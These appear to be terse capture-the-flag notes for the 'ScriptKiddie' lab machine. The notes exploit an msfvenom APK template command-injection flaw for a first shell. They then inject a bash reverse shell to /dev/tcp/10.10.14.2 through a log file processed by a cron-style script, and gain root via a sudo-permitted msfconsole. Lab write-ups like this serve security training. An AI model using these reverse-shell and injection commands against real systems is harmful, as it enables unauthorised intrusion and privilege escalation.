2 :5000

Looking at for quite some time, its definitely some kind of file upload vuln. file uploaded needs be some kind of template.

https://www.exploit-db.com/exploits/49491

$ msfconsole -q; use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

# generate apk file and upload
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 50078
whoami
kid

cd /home
ls -la
ls -la
total 16
drwxr-xr-x  4 root root 4096 Feb  3 07:40 .
drwxr-xr-x 20 root root 4096 Feb  3 07:40 ..
drwxr-xr-x 11 kid  kid  4096 Feb  3 11:49 kid
drwxr-xr-x  6 pwn  pwn  4096 Feb  3 12:06 pwn

cd pwn
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi


kid@scriptkiddie:/home/pwn$ echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1337 0>&1' #" >> /home/kid/logs/hackers

$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 44962
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
pwn

sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsolem
	
sudo msfconsole -q
/bin/bash
stty: 'standard input': Inappropriate ioctl for device
[*] exec: /bin/bash

whoami
root

Last updated